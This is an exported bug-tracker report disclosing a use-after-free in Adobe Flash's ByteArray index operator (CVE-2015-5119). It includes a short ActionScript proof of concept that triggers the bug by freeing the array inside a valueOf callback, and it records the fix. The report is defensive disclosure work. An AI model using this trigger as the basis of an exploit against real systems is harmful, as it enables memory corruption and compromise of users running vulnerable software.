Adobe Flash: Use-after-free in ByteArray Operator[]

[GoogleCodeExporter]

There is a use-after-free in the ByteArray operator []. If a byte array index 
is set to a value with valueOf defined, this method gets called. If valueOf 
contains code that frees the array, such as setting its length, it will lead to 
a use-after-free, as the original ByteArray memory gets set as opposed to the 
newly allocated memory. A PoC is as follows:

        for(var i = 0; i < 1000; i++){
            var b = new ByteArray();
            b.length = 12;
            var n = new myba(b);

            b[0] = n;
        }

In the myba class definition:

        prototype.valueOf = function()
        {

            b.length = 1000;
            bb = new ByteArray();
            bb.length = 12;
            return 77
        }

A swf and as files are attached.

This bug is subject to a 7 day disclosure deadline, as the issue is being 
exploited in the wild. If 7 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 1 Jul 2015 at 9:09

Attachments:

• myba.as
• memtest.as
• memtest.swf

[GoogleCodeExporter]

Original comment by cev...@google.com on 5 Jul 2015 at 6:25

• Added labels: CVE-2015-5119

[GoogleCodeExporter]

Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:15

• Changed state: Fixed
• Added labels: Fixed-2015-Jul-8
• Removed labels: Restrict-View-Commit